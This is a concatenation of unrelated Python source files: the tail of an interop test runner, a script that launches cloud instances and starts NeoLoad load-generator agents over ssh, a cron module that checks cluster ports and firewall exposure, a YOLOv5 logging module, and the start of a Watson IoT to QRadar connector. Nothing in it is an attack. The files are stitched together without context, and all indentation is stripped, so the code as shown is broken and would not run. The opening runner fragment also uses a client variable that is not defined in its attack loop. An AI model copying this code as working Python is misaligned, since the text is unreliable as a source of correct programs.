self.test_results[server][client][testcase] = status
if status == TestResult.FAILED:
nr_failed += 1
# run the measurements
for measurement in self._measurements:
res = self._run_measurement(server, client, measurement)
self.measurement_results[server][client][measurement] = res
for attacker in self._attackers:
for server in self._servers:
# run the attacks
for attack in self._attacks:
status = self._run_attack(server, client, attacker, attack, None)[0]
self.attack_results[attack.target().value][attacker][server][attack] = status #todo: make it work on any target
self._print_results()
self._export_results()
return nr_failed
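# A hedged sketch of driving InteropRunner directly (a run script normally does this);
# the implementations dict and the test/measurement lists below are placeholders:
#
#   runner = InteropRunner(
#       implementations={"myimpl": {"image": "myimpl:latest", "url": "https://example.org"}},
#       servers=["myimpl"], clients=["myimpl"], attackers=[],
#       tests=[testcases.TestCaseHandshake], attacks=[], measurements=[],
#       output="result.json", debug=False,
#   )
#   sys.exit(runner.run())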
|
launchAgents.py
|
#!/usr/bin/env python3
'''launches new NCS instances and starts the NeoLoad LoadGenerator agent on them'''
import argparse
from concurrent import futures
import datetime
import json
import logging
import os
import subprocess
import sys
import time
# third-party module(s)
import requests
# neocortix modules
import ncscli.ncs as ncs
import ncscli.batchRunner as batchRunner
import ncscli.tellInstances as tellInstances
import startForwarders # expected to be in the same directory
neoloadVersion = '7.11.2' # will be overridden by cmd-line arg
nlWebWanted = False
class g_:
signaled = False
interrupted = False
def readJLog( inFilePath ):
'''read JLog file, return list of decoded objects'''
recs = []
# read and decode each line as json
try:
with open( inFilePath, 'rb' ) as inFile:
for line in inFile:
try:
decoded = json.loads( line )
except Exception as exc:
logger.warning( 'exception decoding json (%s) %s', type(exc), exc )
recs.append( decoded )
except Exception as exc:
logger.warning( 'exception reading file (%s) %s', type(exc), exc )
return recs
def scriptDirPath():
'''returns the absolute path to the directory containing this script'''
return os.path.dirname(os.path.realpath(__file__))
def truncateVersion( nlVersion ):
'''drop patch-level part of version number, if any'''
return '.'.join(nlVersion.split('.')[:-1]) if nlVersion.count('.') > 1 else nlVersion
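# e.g. truncateVersion('7.11.2') -> '7.11', while truncateVersion('7.10') is returned unchanged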
class neoloadFrameProcessor(batchRunner.frameProcessor):
'''defines details for installing Neotys Load Generator agent on a worker'''
def installerCmd( self ):
truncVersion = truncateVersion( neoloadVersion )
scoredVersion = neoloadVersion.replace( '.', '_' )
if neoloadVersion == '7.10':
return 'nlAgent/install_7-10_slim.sh'
elif neoloadVersion == '7.7':
return 'nlAgent/install_7-7.sh'
elif neoloadVersion == '7.6':
return 'nlAgent/install_7-6.sh'
else:
return 'nlAgent/install_7-x.sh %s %s %s' % (neoloadVersion, truncVersion, scoredVersion )
def sigtermSignaled():
return g_.signaled
def commandInstance( inst, cmd, timeLimit ):
deadline = time.time() + timeLimit
sshSpecs = inst['ssh']
#logInstallerOperation( iid, ['connect', sshSpecs['host'], sshSpecs['port']] )
with subprocess.Popen(['ssh',
'-p', str(sshSpecs['port']),
'-o', 'ServerAliveInterval=30',
'-o', 'ServerAliveCountMax=12',
sshSpecs['user'] + '@' + sshSpecs['host'], cmd],
encoding='utf8',
#stdout=subprocess.PIPE, # subprocess.PIPE subprocess.DEVNULL
) as proc: # stderr=subprocess.PIPE
#logInstallerOperation( iid, ['command', cmd] )
#stderrThr = threading.Thread(target=trackStderr, args=(proc,))
#stderrThr.start()
abbrevIid = inst['instanceId'][0:16]
while time.time() < deadline:
proc.poll() # sets proc.returncode
if proc.returncode == None:
logger.debug( 'waiting for command on instance %s', abbrevIid)
else:
if proc.returncode == 0:
logger.debug( 'command succeeded on instance %s', abbrevIid )
else:
logger.warning( 'instance %s gave returnCode %d', abbrevIid, proc.returncode )
break
if sigtermSignaled():
break
if g_.interrupted:
break
time.sleep(5)
proc.poll()
returnCode = proc.returncode if proc.returncode != None else 124 # declare timeout if no rc
#if returnCode:
# logger.warning( 'command returnCode %s', returnCode )
#if returnCode == 124:
# logInstallerEvent( 'timeout', args.instTimeLimit, iid )
#else:
# logInstallerEvent('returncode', returnCode, iid )
proc.terminate()
try:
proc.wait(timeout=5)
if proc.returncode:
logger.debug( 'ssh return code %d', proc.returncode )
except subprocess.TimeoutExpired:
logger.warning( 'ssh did not terminate in time' )
#stderrThr.join()
if returnCode:
#logger.warning( 'terminating instance because installerFailed %s', iid )
#terminateInstances( args.authToken, [iid] )
#logOperation( 'terminateBad', [iid], '<recruitInstances>' )
#purgeHostKeys( [inst] )
return returnCode
else:
return 0
return 1
def configureAgent( inst, port, timeLimit=500 ):
iid = inst['instanceId']
logger.debug( 'would configure agent on instance %s for port %d', iid[0:16], port )
rc = 1
# drop patch-level part of version number, if any
truncatedVersion = truncateVersion( neoloadVersion )
# generate a command to modify agent.properties on the instance
configDirPath = '~/neoload%s/conf' % truncatedVersion
if nlWebWanted:
cmd = "cat %s/nlweb.properties >> %s/agent.properties" % tuple( [configDirPath]*2 )
else:
cmd = ":" # a null command
cmd += " && sed -i 's/NCS_LG_PORT/%d/' %s/agent.properties" % (port, configDirPath)
cmd += " && sed -i 's/NCS_LG_HOST/%s/' %s/agent.properties" % (forwarderHost, configDirPath)
if nlWebWanted:
# deployment type for nlweb
dtype = 'SAAS' if args.nlWebUrl == 'SAAS' else 'ONPREMISE'
cmd += " && sed -i 's/NCS_NLWEB_DTYPE/%s/g' %s/agent.properties" % (dtype, configDirPath)
# zone for nlweb
cmd += " && sed -i 's/NCS_NLWEB_ZONE/%s/g' %s/agent.properties" % (args.nlWebZone, configDirPath)
        escapedUrl = args.nlWebUrl.replace( '/', '\\/' )
cmd += " && sed -i 's/NCS_NLWEB_TOKEN/%s/g' %s/agent.properties" % (args.nlWebToken, configDirPath)
cmd += " && sed -i 's/NCS_NLWEB_URL/%s/' %s/agent.properties" % (escapedUrl, configDirPath)
logger.debug( 'info: %s', cmd )
rc = commandInstance( inst, cmd, timeLimit=timeLimit )
return rc
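# For example, with port 7102, forwarderHost "203.0.113.5" and nlWeb disabled
# (all placeholder values), the composed cmd is roughly:
#   : && sed -i 's/NCS_LG_PORT/7102/' ~/neoload7.11/conf/agent.properties \
#     && sed -i 's/NCS_LG_HOST/203.0.113.5/' ~/neoload7.11/conf/agent.properties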
def configureAgents( instances, ports, timeLimit=600 ):
'''configure LG agents, in parallel'''
returnCodes = []
with futures.ThreadPoolExecutor( max_workers=len(instances) ) as executor:
parIter = executor.map( configureAgent, instances, ports, timeout=timeLimit )
returnCodes = [None] * len(instances)
try:
index = 0
for returnCode in parIter:
returnCodes[index] = returnCode
index += 1
time.sleep( .1 )
except KeyboardInterrupt:
logger.warning( 'interrupted, setting flag')
g_.interrupted = True
raise
logger.debug( 'returnCodes: %s', returnCodes )
return returnCodes
def purgeHostKeys( instanceRecs ):
'''try to purgeKnownHosts; warn if any exception'''
logger.debug( 'purgeKnownHosts for %d instances', len(instanceRecs) )
try:
ncs.purgeKnownHosts( instanceRecs )
except Exception as exc:
logger.warning( 'exception from purgeKnownHosts (%s) %s', type(exc), exc, exc_info=True )
return 1
else:
return 0
if __name__ == '__main__':
# configure logger formatting
logger = logging.getLogger(__name__)
logFmt = '%(asctime)s %(levelname)s %(module)s %(funcName)s %(message)s'
logDateFmt = '%Y/%m/%d %H:%M:%S'
formatter = logging.Formatter(fmt=logFmt, datefmt=logDateFmt )
logging.basicConfig(format=logFmt, datefmt=logDateFmt)
#batchRunner.logger.setLevel(logging.DEBUG) # for more verbosity
#startForwarders.logger.setLevel(logging.DEBUG) # for more verbosity
logger.setLevel(logging.INFO)
ap = argparse.ArgumentParser( description=__doc__, fromfile_prefix_chars='@',
formatter_class=argparse.ArgumentDefaultsHelpFormatter )
    ap.add_argument( '--authToken', help='the NCS authorization token to use (or none, to use NCS_AUTH_TOKEN env var)' )
ap.add_argument( '--filter', help='json to filter instances for launch',
default = '{ "regions": ["asia", "europe", "middle-east", "north-america", "oceania"], "dar": ">=99", "dpr": ">=48", "ram": ">=3800000000", "storage": ">=2000000000" }'
)
ap.add_argument( '--sshClientKeyName', help='the name of the uploaded ssh client key to use (default is random)' )
ap.add_argument( '--forwarderHost', help='IP addr (or host name) of the forwarder host',
default='localhost' )
ap.add_argument( '--neoloadVersion', default=neoloadVersion, help='version of neoload LG agent' )
ap.add_argument( '--nlWeb', type=ncs.boolArg, default=False, help='whether to use NeoLoad Web' )
ap.add_argument( '--nlWebToken', help='a token for authorized access to a neoload web server' )
ap.add_argument( '--nlWebUrl', help='the URL of a neoload web server to query' )
ap.add_argument( '--nlWebZone', help='the neoload zone that the agents should belong to',
default='defaultzone' )
ap.add_argument( '--nWorkers', type=int, help='the number of agents to launch',
default=10 )
ap.add_argument( '--outDataDir', required=False, help='a path to the output data dir for this run' )
ap.add_argument( '--portRangeStart', type=int, default=7100,
help='the beginning of the range of port numbers to forward' )
ap.add_argument( '--supportedVersions', action='store_true', help='to list supported versions and exit' )
ap.add_argument( '--cookie' )
args = ap.parse_args()
supportedVersions = ['7.9.2', '7.10.2', '7.11.2', '8.0.0']
if args.supportedVersions:
print( json.dumps( supportedVersions ) )
sys.exit( 0 )
neoloadVersion = args.neoloadVersion
if neoloadVersion not in supportedVersions:
        logger.error( 'version "%s" is not supported; supported versions are %s',
neoloadVersion, sorted( supportedVersions ) )
sys.exit( 1 )
nlWebWanted = args.nlWeb
if nlWebWanted:
# make sure all the necessary nlWeb args were passed in non-empty
if not args.nlWebToken:
logger.error( 'please pass a non-empty --nlWebToken if you want to use NeoLoad Web')
if not args.nlWebUrl:
logger.error( 'please pass a non-empty --nlWebUrl if you want to use NeoLoad Web')
        if not (args.nlWebToken and args.nlWebUrl):
sys.exit( 1 )
outDataDir = args.outDataDir
if not outDataDir:
dateTimeTag = datetime.datetime.now().strftime( '%Y-%m-%d_%H%M%S' )
outDataDir = 'data/neoload_' + dateTimeTag
# you may set forwarderHost manually here, to override auto-detect
forwarderHost = args.forwarderHost
if not forwarderHost:
try:
forwarderHost = requests.get( 'https://api.ipify.org' ).text
        except Exception:
logger.warning( 'could not get public ip addr of this host')
if not forwarderHost:
logger.error( 'forwarderHost not set')
exit(1)
authToken = args.authToken or os.getenv('NCS_AUTH_TOKEN')
instTimeLimit = 11*60 # if neoloadVersion in ['7.10'] else 30*60
nlAgentDirName = 'nlAgent'
if not os.path.isdir( nlAgentDirName ):
if os.path.exists( nlAgentDirName ) and not os.path.islink( nlAgentDirName ):
logger.error( 'you have an nlAgent that is neither a dir nor a symlink')
sys.exit( 1 )
targetPath = os.path.join( scriptDirPath(), nlAgentDirName )
if not os.path.isdir( targetPath ):
logger.error( 'nlAgent dir not found in %s', scriptDirPath() )
sys.exit( 1 )
try:
os.symlink( targetPath, nlAgentDirName, target_is_directory=True )
except Exception as exc:
logger.error( 'could not create symlink for nlAgent (%s) %s', type(exc), exc)
sys.exit( 1 )
logger.debug( 'nlAgent contents: %s', os.listdir(nlAgentDirName) )
if nlWebWanted and not os.path.isfile( 'nlAgent/nlweb.properties'):
logger.error( 'the file nlAgent/nlweb.properties was not found')
sys.exit(1)
try:
# call runBatch to launch worker instances and install the load generator agent on them
rc = batchRunner.runBatch(
frameProcessor = neoloadFrameProcessor(),
recruitOnly=True,
pushDeviceLocs=False,
commonInFilePath = 'nlAgent',
authToken = authToken,
cookie = args.cookie,
sshClientKeyName=args.sshClientKeyName,
encryptFiles=False,
timeLimit = 60*60,
instTimeLimit = instTimeLimit,
filter = args.filter,
outDataDir = outDataDir,
nWorkers = args.nWorkers
)
if rc == 0:
# get iids of instances successfully installed
recruiterJlogFilePath = os.path.join( outDataDir, 'recruitInstances.jlog' )
recruitedIids = []
if os.path.isfile( recruiterJlogFilePath ):
recruiterResults = readJLog( recruiterJlogFilePath )
if not recruiterResults:
logger.warning( 'no entries in %s', recruiterJlogFilePath )
for result in recruiterResults:
if 'timeout' in result:
logger.debug( 'recruiter timeout: %s', result )
elif 'returncode' in result:
if result['returncode'] != 0:
logger.debug( 'recruiter result: %s', result )
else:
recruitedIids.append( result.get( 'instanceId' ) )
recruitedIids = set( recruitedIids )
logger.debug( '%d recruitedIids: %s', len(recruitedIids), recruitedIids )
portRangeStart=args.portRangeStart
launchedJsonFilePath = outDataDir +'/recruitLaunched.json'
launchedInstances = []
# get details of launched instances from the json file
with open( launchedJsonFilePath, 'r') as jsonInFile:
try:
launchedInstances = json.load(jsonInFile) # an array
except Exception as exc:
logger.warning( 'could not load json (%s) %s', type(exc), exc )
sys.exit( 2 )
launchedIids = [inst['instanceId'] for inst in launchedInstances ]
#startedInstances = [inst for inst in launchedInstances if inst['state'] == 'started' ]
#logger.info( '%d instances were launched', len(startedInstances) )
startedInstances = [inst for inst in launchedInstances if inst['instanceId'] in recruitedIids ]
#COULD check memory and available ports here
truncVersion = truncateVersion( neoloadVersion )
agentLogFilePath = '/root/.neotys/neoload/v%s/logs/agent.log' % truncVersion
starterCmd = 'cd ~/neoload7.xx/ && /usr/bin/java -Xms50m -Xmx100m -Dvertx.disableDnsResolver=true -classpath $HOME/neoload7.xx/.install4j/i4jruntime.jar:$HOME/neoload7.xx/.install4j/launchera03c11da.jar:$HOME/neoload7.xx/bin/*:$HOME/neoload7.xx/lib/crypto/*:$HOME/neoload7.xx/lib/*:$HOME/neoload7.xx/lib/jdbcDrivers/*:$HOME/neoload7.xx/lib/plugins/ext/* install4j.com.neotys.nl.agent.launcher.AgentLauncher_LoadGeneratorAgent start & sleep 30 && free --mega 1>&2'
starterCmd = starterCmd.replace( 'neoload7.xx', 'neoload'+truncVersion )
if neoloadVersion == '7.7':
starterCmd = 'cd ~/neoload7.7/ && /usr/bin/java -Xms50m -Xmx100m -Dvertx.disableDnsResolver=true -classpath $HOME/neoload7.7/.install4j/i4jruntime.jar:$HOME/neoload7.7/.install4j/launchera03c11da.jar:$HOME/neoload7.7/bin/*:$HOME/neoload7.7/lib/crypto/*:$HOME/neoload7.7/lib/*:$HOME/neoload7.7/lib/jdbcDrivers/*:$HOME/neoload7.7/lib/plugins/ext/* install4j.com.neotys.nl.agent.launcher.AgentLauncher_LoadGeneratorAgent start & sleep 30'
elif neoloadVersion == '7.6':
starterCmd = 'cd ~/neoload7.6/ && /usr/bin/java -Dneotys.vista.headless=true -Xmx512m -Dvertx.disableDnsResolver=true -classpath $HOME/neoload7.6/.install4j/i4jruntime.jar:$HOME/neoload7.6/.install4j/launcherc0a362f9.jar:$HOME/neoload7.6/bin/*:$HOME/neoload7.6/lib/crypto/*:$HOME/neoload7.6/lib/*:$HOME/neoload7.6/lib/jdbcDrivers/*:$HOME/neoload7.6/lib/plugins/ext/* install4j.com.neotys.nl.agent.launcher.AgentLauncher_LoadGeneratorAgentService start &'
configuredInstances = []
portMap = {}
if True: # nlWebWanted
# configure the agent properties on each instance
ports = list( range( portRangeStart, portRangeStart+len(startedInstances) ) )
for index, inst in enumerate( startedInstances ):
iid = inst['instanceId']
portMap[iid] = index + portRangeStart
logger.info( 'configuring agents')
returnCodes = configureAgents( startedInstances, ports, timeLimit=600 )
for index, code in enumerate( returnCodes ):
if code==0:
configuredInstances.append( startedInstances[index] )
else:
iid = startedInstances[index].get('instanceId')
logger.info( 'inst %s was not configured properly', iid[0:8] )
# start the agent on each instance
stepStatuses = tellInstances.tellInstances( configuredInstances, command=starterCmd,
resultsLogFilePath=outDataDir +'/startAgents.jlog',
timeLimit=30*60,
knownHostsOnly=True
)
logger.debug( 'starter statuses: %s', stepStatuses )
# make a list of instances where the agent was started
goodIids = []
for status in stepStatuses:
if isinstance( status['status'], int) and status['status'] == 0:
goodIids.append( status['instanceId'])
else:
logger.warning( 'could not start agent on %s', status['instanceId'][0:8] )
#COULD check bound ports again here
#COULD download logs from all installed instances rather than just good-started instances
goodInstances = [inst for inst in startedInstances if inst['instanceId'] in goodIids ]
if goodInstances:
time.sleep( 60 )
# download the agent.log file from each instance
stepStatuses = tellInstances.tellInstances( goodInstances,
download=agentLogFilePath, downloadDestDir=outDataDir +'/agentLogs',
timeLimit=30*60,
knownHostsOnly=True
)
logger.debug( 'download statuses: %s', stepStatuses )
# make a list of instances where the log file was downloaded and agent start is verified
goodIids = []
for status in stepStatuses:
if isinstance( status['status'], int) and status['status'] == 0:
iid = status['instanceId']
logFilePath = os.path.join( outDataDir, 'agentLogs', iid, 'agent.log' )
try:
with open( logFilePath, 'r' ) as logFile:
contents = logFile.read().rstrip()
if ' ERROR ' in contents:
lastLine = contents.split('\n')[-1].strip()
logger.warning( 'log for %s indicates error "%s"', iid[0:8], lastLine )
elif ': Agent started' not in contents:
logger.warning( 'log for %s says it did not start', iid[0:8] )
else:
goodIids.append( iid )
except Exception as exc:
logger.warning( 'exception reading log (%s) %s', type(exc), exc )
else:
logger.warning( 'could not download log from %s', status['instanceId'][0:8] )
goodInstances = [inst for inst in goodInstances if inst['instanceId'] in goodIids ]
with open( outDataDir + '/startedAgents.json','w' ) as outFile:
json.dump( goodInstances, outFile, indent=2 )
# plot map of workers
if os.path.isfile( outDataDir +'/startedAgents.json' ):
rc2 = subprocess.call( [scriptDirPath()+'/plotAgentMap.py', '--dataDirPath', outDataDir],
stdout=subprocess.DEVNULL )
if rc2:
logger.warning( 'plotAgentMap exited with returnCode %d', rc2 )
# start the ssh port-forwarding
logger.info( 'would forward ports for %d instances', len(goodInstances) )
forwarders = startForwarders.startForwarders( goodInstances,
forwarderHost=forwarderHost,
portMap=portMap,
portRangeStart=portRangeStart, maxPort=portRangeStart+100,
forwardingCsvFilePath=outDataDir+'/agentForwarding.csv'
)
if len( forwarders ) < len( goodInstances ):
logger.warning( 'some instances could not be forwarded to' )
logger.debug( 'forwarders: %s', forwarders )
#TODO get iids only for successfully forwarded agents
forwardedIids = [inst['instanceId'] for inst in goodInstances ]
unusableIids = list( set(launchedIids) - set( forwardedIids) )
if unusableIids:
logger.debug( 'terminating %d unusable instances', len(unusableIids) )
ncs.terminateInstances( authToken, unusableIids )
unusableInstances = [inst for inst in launchedInstances \
if inst['instanceId'] in unusableIids]
purgeHostKeys( unusableInstances )
if launchedInstances:
print( 'when you want to terminate these instances, use %s %s "%s"'
% (sys.executable, scriptDirPath()+'/terminateAgents.py', outDataDir))
sys.exit( rc )
except KeyboardInterrupt:
        logger.warning( 'an interruption occurred')
|
CronTools.py
|
# coding: utf-8
from src.orm.SqlStrunct import Monitor
import multiprocessing
from src.orm.SqlUtil import SqlUtil
from src.orm.SqlStrunct import Cluster
import threading
from Config import Config
import time
import telnetlib
from datetime import datetime
from src.tools.DateTools import DateTools
import random
conf = Config()
# monitor cron
class CronMonitor(object):
queue = multiprocessing.Queue()
su = SqlUtil()
def __new__(cls, *args, **kwargs):
if not hasattr(cls, "_init"):
cls._init = object.__new__(cls)
return cls._init
def insert_monitor(self, monitor):
if not isinstance(monitor, Monitor):
print "Error: monitor 必须是Monitor"
self.queue.put(monitor)
    # method executed by the cron worker process
def cron_exec(self):
while True:
obj = self.queue.get()
if not isinstance(obj, Monitor):
print "Error, %s" % obj
self.su.insert_one_sql(obj)
    # start the worker process
@staticmethod
def start():
ct = CronMonitor()
multiprocessing.Process(target=ct.cron_exec).start()
# cluster cron
class CronCluster(object):
su = SqlUtil()
def __new__(cls, *args, **kwargs):
if not hasattr(cls, "_init"):
cls._init = object.__new__(cls)
return cls._init
    # check whether the cluster service port is reachable
@staticmethod
def exec_check_port(cluster):
if not isinstance(cluster, Cluster):
return
try:
telnetlib.Telnet(host=cluster.ip, port=cluster.port)
cluster.status = True
except Exception as e:
cluster.status = False
cluster.detail = e.message
cluster.last_update = DateTools.date_format(datetime.now())
su = CronCluster.su
su.update_cluster_sql(cluster)
    # check the ports of all clusters
@staticmethod
def check_port():
try:
su = CronCluster.su
clusters, err = su.get_cluster()
if err:
print err
return
for cluster in clusters:
enable = False
while not enable:
if threading.activeCount() < 20:
threading.Thread(target=CronCluster.exec_check_port, args=(cluster,)).start()
enable = True
else:
time.sleep(5)
except Exception as e:
print e.message
    # check the firewall ports of a single cluster
@staticmethod
def exec_check_firewalld(cluster):
if not isinstance(cluster, Cluster):
return
        # if all ports are deliberately open, there is nothing to check
if cluster.normal_ports == "ALL":
return
        # build the monitor record
monitor = Monitor()
monitor.status = True
monitor.detail = "%s" % cluster.ip
monitor.cluster = cluster.name
monitor.time = DateTools.date_format(datetime.now())
monitor.type = "firewalld"
        # ports that are expected to be reachable, e.g. "80,8000-8010"
        normal_ports = []
        out_ports = cluster.normal_ports.split(",")
        for port in out_ports:
            if '-' in port:
                start, end = port.split('-')
                normal_ports.extend(range(int(start), int(end) + 1))
            else:
                normal_ports.append(int(port))
ports = [22, 80, 443, 7180, 8088, 8888, 11000, 10000, 8998,
random.randint(15000, 65535), random.randint(15000, 65535), random.randint(15000, 65535)]
[ports.remove(port) for port in normal_ports if port in ports]
for port in ports:
try:
telnetlib.Telnet(host=cluster.ip, port=port)
if monitor.status:
monitor.status = False
monitor.detail += u"%s 可以正常连接,与预期状态不符合" % port
except Exception:
pass
monitor.detail += u"非法端口检查正常" if monitor.status else u"非法端口检查不正常"
CronCluster.su.insert_one_sql(monitor)
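    # For example, normal_ports "22,8000-8002" expands to [22, 8000, 8001, 8002];
    # any of those values found in the probe list `ports` is removed before probing.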
    # check the firewall ports of all clusters
@staticmethod
def check_firewalld():
try:
su = CronCluster.su
clusters, err = su.get_cluster()
if err:
print err
return
for cluster in clusters:
enable = False
while not enable:
if threading.activeCount() < 20:
threading.Thread(target=CronCluster.exec_check_firewalld, args=(cluster,)).start()
enable = True
else:
time.sleep(5)
except Exception as e:
print e.message
    # method executed by the cron worker process
@staticmethod
def cron_exec():
while True:
threading.Thread(target=CronCluster.check_port).start()
threading.Thread(target=CronCluster.check_firewalld).start()
time.sleep(conf.monitor_frequency * 60)
    # start the worker process
@staticmethod
def start():
multiprocessing.Process(target=CronCluster.cron_exec).start()
# Data delete
class CronDataExpire(object):
su = SqlUtil()
def __new__(cls, *args, **kwargs):
if not hasattr(cls, "_init"):
cls._init = object.__new__(cls)
return cls._init
    # delete expired monitoring data
@staticmethod
def data_expire_delete():
data_keep = conf.data_keep
expire_time = DateTools.update_time(datetime.now(), days=data_keep, add=False)
CronDataExpire.su.delete_expire_monitor_data(expire_time)
    # method executed by the cron worker process
@staticmethod
def cron_exec():
while True:
CronDataExpire.data_expire_delete()
time.sleep(60 * 60)
    # start the worker process
@staticmethod
def start():
multiprocessing.Process(target=CronDataExpire.cron_exec).start()
|
__init__.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Logging utils
"""
import os
import warnings
from threading import Thread
import pkg_resources as pkg
import torch
from torch.utils.tensorboard import SummaryWriter
from utils.general import colorstr, emojis
from utils.loggers.wandb.wandb_utils import WandbLogger
from utils.plots import plot_images, plot_results
from utils.torch_utils import de_parallel
LOGGERS = ('csv', 'tb', 'wandb') # text-file, TensorBoard, Weights & Biases
RANK = int(os.getenv('RANK', -1))
try:
import wandb
assert hasattr(wandb, '__version__') # verify package import not local dir
if pkg.parse_version(wandb.__version__) >= pkg.parse_version('0.12.2') and RANK in [0, -1]:
wandb_login_success = wandb.login(timeout=30)
if not wandb_login_success:
wandb = None
except (ImportError, AssertionError):
wandb = None
class Loggers():
# YOLOv5 Loggers class
def __init__(self, save_dir=None, weights=None, opt=None, hyp=None, logger=None, include=LOGGERS):
self.save_dir = save_dir
self.weights = weights
self.opt = opt
self.hyp = hyp
self.logger = logger # for printing results to console
self.include = include
self.keys = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95', # metrics
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for k in LOGGERS:
setattr(self, k, None) # init empty logger dictionary
self.csv = True # always log to csv
# Message
if not wandb:
prefix = colorstr('Weights & Biases: ')
s = f"{prefix}run 'pip install wandb' to automatically track and visualize YOLOv5 🚀 runs (RECOMMENDED)"
print(emojis(s))
# TensorBoard
s = self.save_dir
if 'tb' in self.include and not self.opt.evolve:
prefix = colorstr('TensorBoard: ')
self.logger.info(f"{prefix}Start with 'tensorboard --logdir {s.parent}', view at http://localhost:6006/")
self.tb = SummaryWriter(str(s))
# W&B
if wandb and 'wandb' in self.include:
wandb_artifact_resume = isinstance(self.opt.resume, str) and self.opt.resume.startswith('wandb-artifact://')
run_id = torch.load(self.weights).get('wandb_id') if self.opt.resume and not wandb_artifact_resume else None
self.opt.hyp = self.hyp # add hyperparameters
self.wandb = WandbLogger(self.opt, run_id)
else:
self.wandb = None
def on_pretrain_routine_end(self):
# Callback runs on pre-train routine end
paths = self.save_dir.glob('*labels*.jpg') # training labels
if self.wandb:
self.wandb.log({"Labels": [wandb.Image(str(x), caption=x.name) for x in paths]})
def on_train_batch_end(self, ni, model, imgs, targets, paths, plots, sync_bn):
# Callback runs on train batch end
if plots:
if ni == 0:
if not sync_bn: # tb.add_graph() --sync known issue https://github.com/ultralytics/yolov5/issues/3754
with warnings.catch_warnings():
warnings.simplefilter('ignore') # suppress jit trace warning
self.tb.add_graph(torch.jit.trace(de_parallel(model), imgs[0:1], strict=False), [])
if ni < 3:
f = self.save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
if self.wandb and ni == 10:
files = sorted(self.save_dir.glob('train*.jpg'))
self.wandb.log({'Mosaics': [wandb.Image(str(f), caption=f.name) for f in files if f.exists()]})
def on_train_epoch_end(self, epoch):
# Callback runs on train epoch end
if self.wandb:
self.wandb.current_epoch = epoch + 1
def on_val_image_end(self, pred, predn, path, names, im):
# Callback runs on val image end
if self.wandb:
self.wandb.val_one_image(pred, predn, path, names, im)
def on_val_end(self):
# Callback runs on val end
if self.wandb:
files = sorted(self.save_dir.glob('val*.jpg'))
self.wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in files]})
def on_fit_epoch_end(self, vals, epoch, best_fitness, fi):
# Callback runs at the end of each fit (train+val) epoch
x = {k: v for k, v in zip(self.keys, vals)} # dict
if self.csv:
file = self.save_dir / 'results.csv'
n = len(x) + 1 # number of cols
s = '' if file.exists() else (('%20s,' * n % tuple(['epoch'] + self.keys)).rstrip(',') + '\n') # add header
with open(file, 'a') as f:
f.write(s + ('%20.5g,' * n % tuple([epoch] + vals)).rstrip(',') + '\n')
if self.tb:
for k, v in x.items():
self.tb.add_scalar(k, v, epoch)
if self.wandb:
self.wandb.log(x)
self.wandb.end_epoch(best_result=best_fitness == fi)
def on_model_save(self, last, epoch, final_epoch, best_fitness, fi):
# Callback runs on model save event
if self.wandb:
if ((epoch + 1) % self.opt.save_period == 0 and not final_epoch) and self.opt.save_period != -1:
self.wandb.log_model(last.parent, self.opt, epoch, fi, best_model=best_fitness == fi)
def on_train_end(self, last, best, plots, epoch):
# Callback runs on training end
if plots:
plot_results(file=self.save_dir / 'results.csv') # save results.png
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
files = [(self.save_dir / f) for f in files if (self.save_dir / f).exists()] # filter
if self.tb:
import cv2
for f in files:
self.tb.add_image(f.stem, cv2.imread(str(f))[..., ::-1], epoch, dataformats='HWC')
if self.wandb:
self.wandb.log({"Results": [wandb.Image(str(f), caption=f.name) for f in files]})
# Calling wandb.log. TODO: Refactor this into WandbLogger.log_model
if not self.opt.evolve:
wandb.log_artifact(str(best if best.exists() else last), type='model',
name='run_' + self.wandb.wandb_run.id + '_model',
aliases=['latest', 'best', 'stripped'])
self.wandb.finish_run()
else:
self.wandb.finish_run()
self.wandb = WandbLogger(self.opt)
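# Minimal usage sketch (illustrative; in YOLOv5 the training script constructs this
# object with its own save_dir/weights/opt/hyp/logger and calls the callbacks at the
# matching points in the training loop):
#   loggers = Loggers(save_dir=save_dir, weights=weights, opt=opt, hyp=hyp, logger=logger)
#   loggers.on_pretrain_routine_end()
#   loggers.on_train_epoch_end(epoch)
#   loggers.on_fit_epoch_end(vals, epoch, best_fitness, fi)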
|
getwiotpdata.py
|
# *****************************************************************************
# Copyright (c) 2018 IBM Corporation and other Contributors.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Ranjan Dasgupta - Initial drop for Alpha release
#
# *****************************************************************************
#
# Connector application used for integrating Watson IoT Platform with QRadar
#
import os
import logging
import logging.handlers
from datetime import datetime
import time
import threading
from threading import Thread
from threading import Lock
import sys
import json
import re
import ibmiotf
import ibmiotf.application
import ConfigParser
import signal
import socket
# SYSLOG setup
# Application names -
APPNAMECONNECTION = "wiotp_qradar:1.0:Connection "
# APPNAMEDEVICEMGMT = "wiotp_qradar:1.0:DevMgmt "
sysLogger = logging.getLogger('WIOTPSYSLOG')
# Setup Application logger to console
applogger = logging.getLogger('qradar-connector')
applogger.setLevel(logging.DEBUG)
conlogger = logging.StreamHandler()
conlogger.setLevel(logging.DEBUG)
applogger.addHandler(conlogger)
# Variables to control WIoTP API invocation
#
# Variables used to control time period in GET /connection/logs API
# Time periods are in ISO8601 format
curTime = time.gmtime()
lastTime = curTime
curISOTime = time.strftime("%Y-%m-%dT%H:%M:%S", curTime)
lastISOTime = curISOTime
# compile regular expressions
authREObj = re.compile(r'(.*): ClientID=\S(.*?)\S, ClientIP=(.*)')
connREObj = re.compile(r'^Closed\sconnection\sfrom\s(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\.(.*)')
genrREObj = re.compile(r'(.*)ClientIP=(.*)')
# compile regex for log file line
logfREObj = re.compile(r'^(.*?) LOGMSG=(.*$)')
systemIP = '127.0.0.1'
test_mode = 0
fetchInit = 0
configData = {}
startLoop = 0
stopLoop = 0
threadStopped = 0
# Signal handler
def signalHandler(sig, frame):
global stopLoop
stopLoop = 1
